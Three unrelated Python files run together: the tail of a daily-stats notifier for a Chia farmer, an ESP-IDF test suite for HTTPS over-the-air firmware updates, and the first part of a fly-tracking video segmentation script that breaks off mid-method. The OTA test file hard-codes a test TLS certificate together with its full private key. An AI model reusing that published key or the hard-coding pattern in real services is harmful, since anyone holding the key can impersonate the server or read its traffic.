from src.notifier import Event, EventType, EventPriority, EventService
class StatsManager:
"""Manage all stat accumulators and trigger daily notification to the user
with a summary from all stats that have been collected for the past 24 hours.
"""
def __init__(self, config: dict, notify_manager: NotifyManager):
try:
self._enable = config["enable"]
self._time_of_day = config["time_of_day"]
except KeyError as key:
logging.error(f"Invalid config.yaml. Missing key: {key}")
self._enable = False
if not self._enable:
logging.warning("Disabled stats and daily notifications")
return
logging.info("Enabled stats for daily notifications")
self._notify_manager = notify_manager
self._stat_accumulators = [
FoundProofStats(),
SearchTimeStats(),
NumberPlotsStats(),
EligiblePlotsStats(),
SignagePointStats(),
]
logging.info(f"Summary notifications will be sent out daily at {self._time_of_day} o'clock")
self._datetime_next_summary = datetime.now().replace(hour=self._time_of_day, minute=0, second=0, microsecond=0)
if datetime.now() > self._datetime_next_summary:
self._datetime_next_summary += timedelta(days=1)
# Start thread
self._is_running = True
self._thread = Thread(target=self._run_loop)
self._thread.start()
def consume_harvester_messages(self, objects: List[HarvesterActivityMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, HarvesterActivityConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_signage_point_messages(self, objects: List[FinishedSignagePointMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, FinishedSignageConsumer):
for obj in objects:
stat_acc.consume(obj)
def _send_daily_notification(self):
machine_name = os.uname()[1]
summary = f"Hello farmer {machine_name}! 👋 Here's what happened in the last 24 hours:\n"
for stat_acc in self._stat_accumulators:
summary += "\n" + stat_acc.get_summary()
stat_acc.reset()
self._notify_manager.process_events(
[Event(type=EventType.DAILY_STATS, priority=EventPriority.LOW, service=EventService.DAILY, message=summary)]
)
def _run_loop(self):
while self._is_running:
if datetime.now() > self._datetime_next_summary:
self._send_daily_notification()
self._datetime_next_summary += timedelta(days=1)
sleep(1)
def stop(self):
self._is_running = False
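# Example usage (a minimal sketch; the config keys match those read in
# __init__ above, and notify_manager is an already-constructed NotifyManager):
#
#   manager = StatsManager({"enable": True, "time_of_day": 21}, notify_manager)
#   manager.consume_harvester_messages(parsed_harvester_messages)
#   manager.consume_signage_point_messages(parsed_signage_point_messages)
#   manager.stop()  # stops the daily-summary thread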
|
example_test.py
|
import re
import os
import struct
import socket
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
import random
import subprocess
try:
import BaseHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
import http.server as BaseHTTPServer
from http.server import SimpleHTTPRequestHandler
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, "w+") as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, "server_key.pem")
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(["openssl", "s_server", "-WWW", "-key", key_file, "-cert", server_file, "-port", str(server_port)])
return chunked_server
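# For reference, the subprocess above is equivalent to running:
#   openssl s_server -WWW -key server_key.pem -cert server_cert.pem -port 8070
# With -WWW, s_server answers "GET /<path>" requests by serving ./<path> over
# TLS; the test uses it to exercise the chunked-download path on the device.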
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(SimpleHTTPRequestHandler):
def do_GET(self):
print("Sending resp, URL: " + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def handle(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
server_file, key_file = get_ca_cert(ota_image_dir)
redirectHandler = redirect_handler_factory("https://" + server_ip + ":" + str(redirection_port) + "/advanced_https_ota.bin")
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file multiple times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
    # The HTTPS server runs on a daemon thread and exits with the test process.
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated.bin"
    # Size of truncated file to be generated. This value can range from 288 bytes (image header size) to the size of the original binary file
    # truncated_bin_size is set to 64000 to reduce the time consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "rb+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "wb+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name)
dut1.expect("Image validation failed, image is corrupted", timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
    Working of OTA when the headers of the binary file are truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated_header.bin"
    # Size of truncated file to be generated. This value should be less than 288 bytes (image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "rb+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "wb+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name)
dut1.expect("advanced_https_ota_example: esp_https_ota_read_img_desc failed", timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
    Working of OTA when random data is served as the binary file is validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = "random.bin"
    # Size of random binary file. 32000 is chosen to reduce the time required to run the test case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, "wb+")
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(struct.pack("B", 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack("B", random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + random_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + random_bin_name)
dut1.expect("esp_ota_ops: OTA image has invalid magic byte", timeout=10)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file from a chunked-encoding server.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8070/" + bin_name))
dut1.write("https://" + host_ip + ":8070/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, "server_cert.pem"))
os.remove(os.path.join(dut1.app.binary_path, "server_key.pem"))
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
    This is a positive test case, which starts an OTA server and a redirection server.
    The redirection server redirects the HTTP request to the main server's port.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
    # Port to which the request should be redirected
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = Thread(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
    # The HTTPS and redirect servers run on daemon threads and exit with the test process.
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(redirection_server_port) + "/" + bin_name))
dut1.write("https://" + host_ip + ":" + str(redirection_server_port) + "/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
|
fly_seg.py
|
#!/GPFS/zhangli_lab_permanent/zhuqingjie/env/py3_tf2/bin/python
'''
@Time : 20/07/21 06:06 PM
@Author : zhuqingjie
@User : zhu
@FileName: fly_seg.py
@Software: PyCharm
'''
import math
import random
import time
from pathlib import Path
import cv2
import numpy as np
from scipy import stats
from easyFlyTracker.src_code.Camera_Calibration import Undistortion
from easyFlyTracker.src_code.fly_angle import Fly_angle
from easyFlyTracker.src_code.gui_config import GUI_CFG
from easyFlyTracker.src_code.utils import Pbar, Wait
class FlySeg():
    '''
    Computes the motion trajectory of every fly in the video.
    Returns the flies' coordinates; the sentinel coordinate (-1, -1) is returned when:
    1. the fly does not belong to a ROI ---> every frame of that fly is (-1, -1)
    2. the binary mask image has fewer than 2 connected components, i.e. fly
       segmentation failed for that frame ---> individual frames of that fly are (-1, -1)
    '''
__doc__ = 'flyseg'
def __init__(
self,
            video_path,  # path to the video
            output_dir,  # output directory
            save_txt_name,  # name of the txt result to save (a .npy with the same stem is saved too); just a name, not an absolute path
            begin_time,  # time point (in minutes) at which to start
            # h_num, w_num,  # grid layout of the dishes (rows by columns)
            Undistortion_model_path=None,  # path to the distortion-correction parameters
            duration_time=None,  # how long to process (in minutes)
            # dish_exclude=None,  # dishes to exclude (e.g. empty dish, dead fly); 1-D or (h_num, w_num); excluded dishes are reported as (-1, -1)
            seg_th=120,  # segmentation threshold
            background_th=70,  # threshold for the difference from the background
            area_th=0.5,  # area-ratio threshold of the inner circle region
            # minR_maxR_minD=(40, 50, 90),  # Hough circle params: min radius, max radius, min distance
skip_config=False,
):
        # Initialize the various directories
self.video_path = Path(video_path)
self.output_dir = Path(output_dir)
        self.saved_dir = Path(self.output_dir, '.cache')  # directory for intermediate results
        # The background image differs with and without distortion correction,
        # so two different file names are used to tell them apart.
if Undistortion_model_path:
self.bg_img_path = Path(self.saved_dir, 'background_image_undistort.bmp')
else:
self.bg_img_path = Path(self.saved_dir, 'background_image.bmp')
        self.res_txt_path = Path(self.output_dir, save_txt_name)  # the txt result is for the user, so save it to the user-facing output directory
self.res_npy_path = Path(self.saved_dir, f'{save_txt_name[:-3]}npy')
self.heatmap_path = Path(self.saved_dir, f'heatmap.npy')
self.fly_angles_path = Path(self.saved_dir, f'fly_angles.npy')
self.saved_dir.mkdir(exist_ok=True)
self.video_stem = str(Path(video_path).stem)
self.seg_th = seg_th
self.undistort = Undistortion(Undistortion_model_path)
self.background_th = background_th
self.video = cv2.VideoCapture(str(self.video_path))
self.video_frames_num = int(self.video.get(cv2.CAP_PROP_FRAME_COUNT))
self.video_fps = round(self.video.get(cv2.CAP_PROP_FPS))
# gui config
_, temp_frame = self.video.read()
        # Heatmap accumulator. What is accumulated is not the coordinate but the
        # whole binarized region; each frame adds 1 (not 255) per pixel.
        self.heatmap = np.zeros(temp_frame.shape[:2], int)
        # If distortion correction is enabled, check that the resolution of the
        # images used to train the calibration model matches the current video.
if Undistortion_model_path:
map_sp = self.undistort.mapxy.shape[-2:]
frame_sp = temp_frame.shape[:2]
if map_sp != frame_sp:
                print('The resolution of the calibration-model training images is not the same as the resolution of the video!')
exit()
        # If the config step is skipped, a config.pkl file must already exist.
if skip_config:
if not Path(self.output_dir, 'config.pkl').exists():
print("'config.pkl' file is not exists!")
exit()
temp_frame = self.undistort.do(temp_frame)
g = GUI_CFG(temp_frame, [], str(self.output_dir))
res, AB_dist = g.CFG_circle(direct_get_res=skip_config)
if len(res) == 0: raise ValueError
rs = [re[-1] for re in res]
self.dish_radius = int(round(float(np.mean(np.array(rs)))))
self.region_radius = int(round(math.sqrt(area_th) * self.dish_radius))
self.cps = [tuple(re[:2]) for re in res]
# get rois and mask images
self._get_rois()
self._get_maskimgs()
        # compute the background image
        self.comp_bg()
        # instantiate the helper that computes fly angles
        self.flyangle = Fly_angle()
# set begin frame
begin_frame = round(begin_time * 60 * self.video_fps)
self.begin_frame = begin_frame
self.video.set(cv2.CAP_PROP_POS_FRAMES, self.begin_frame)
if duration_time in (None, 'None', 0):
self.duration_frames = self.video_frames_num - self.begin_frame
else:
self.duration_frames = duration_time * 60 * self.video_fps
        # If the user configuration is unreasonable and the requested span exceeds
        # the video length, clip it to the real video length
        if self.duration_frames > self.video_frames_num:
            self.duration_frames = self.video_frames_num
def _get_rois(self):
r = self.dish_radius
# (h_start, h_end, w_start, w_end)
self.rois = [
(cp[1] - r, cp[1] + r, cp[0] - r, cp[0] + r)
for cp in self.cps
]
def _get_maskimgs(self):
h = int(self.video.get(cv2.CAP_PROP_FRAME_HEIGHT))
w = int(self.video.get(cv2.CAP_PROP_FRAME_WIDTH))
# h, w = 485,863
self.mask_imgs = [
cv2.circle(np.zeros((h, w), np.uint8), cp, self.dish_radius, 255, -1)
for cp in self.cps
]
        mask_all = np.zeros((h, w), bool)
        for img in self.mask_imgs:
            mask_all |= img.astype(bool)  # logical OR accumulates all dish masks
# mask_all = mask_all.astype(np.uint8) * 255
self.mask_all = mask_all
# save
np.save(Path(self.saved_dir, 'mask_imgs.npy'), self.mask_imgs)
# np.save(Path(self.saved_dir, 'cps.npy'), self.cps)
# np.save(Path(self.saved_dir, 'dish_radius.npy'), self.dish_radius)
def comp_bg(self):
# params
frames_num_used = 800
if self.bg_img_path.exists():
bg = cv2.imread(str(self.bg_img_path))
else:
with Wait('Collect frames'):
tim = time.time()
inds = list(range(self.video_frames_num))
random.shuffle(inds)
inds = inds[:frames_num_used]
frames = []
for i in inds:
# print(f'{i}')
self.video.set(cv2.CAP_PROP_POS_FRAMES, i)
                    ret, frame = self.video.read()
                    if not ret:
                        break
                    # undistort only after a successful read; the previous order
                    # would pass None to the undistorter on a failed read
                    frame = self.undistort.do(frame)
                    frames.append(frame)
frames = np.array(frames)
# print(frames.shape)
            with Wait('Calculate the background image'):
                # per-pixel mode over the sampled frames: because the flies move,
                # the most frequent value at each pixel is the background
                sx = stats.mode(frames)
                bg = sx[0][0]
bg = cv2.medianBlur(bg, 3)
cv2.imwrite(str(self.bg_img_path), bg)
print(f'Finished, time consuming:{time.time() - tim}s')
self.video.set(cv2.CAP_PROP_POS_FRAMES, 0)
self.bg = bg
self.gray_bg_int16 = cv2.cvtColor(bg, cv2.COLOR_BGR2GRAY).astype(np.int16)
def play(self, just_save_one_frame=False):
i = 0
pbar = Pbar(total=self.duration_frames)
while True:
ret, frame = self.video.read()
if not ret: break
frame = self.undistort.do(frame)
src = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
foreground_mask = np.abs(frame.astype(np.int16) - self.gray_bg_int16) > self.background_th
# cv2.imshow('foreground_mask', foreground_mask.astype(np.uint8) * 255)
frame = frame < self.seg_th
frame *= self.mask_all
frame = frame.astype(np.uint8) * 255 * foreground_mask
for cp in self.cps:
cv2.circle(frame, cp, self.dish_radius, 255, 1)
cv2.circle(src, cp, self.dish_radius, (0, 0, 255), 1)
# cv2.circle(frame, cp, cfg.Region.radius, 175, 1)
# cv2.circle(src, cp, cfg.Region.radius, 200, 1)
if just_save_one_frame:
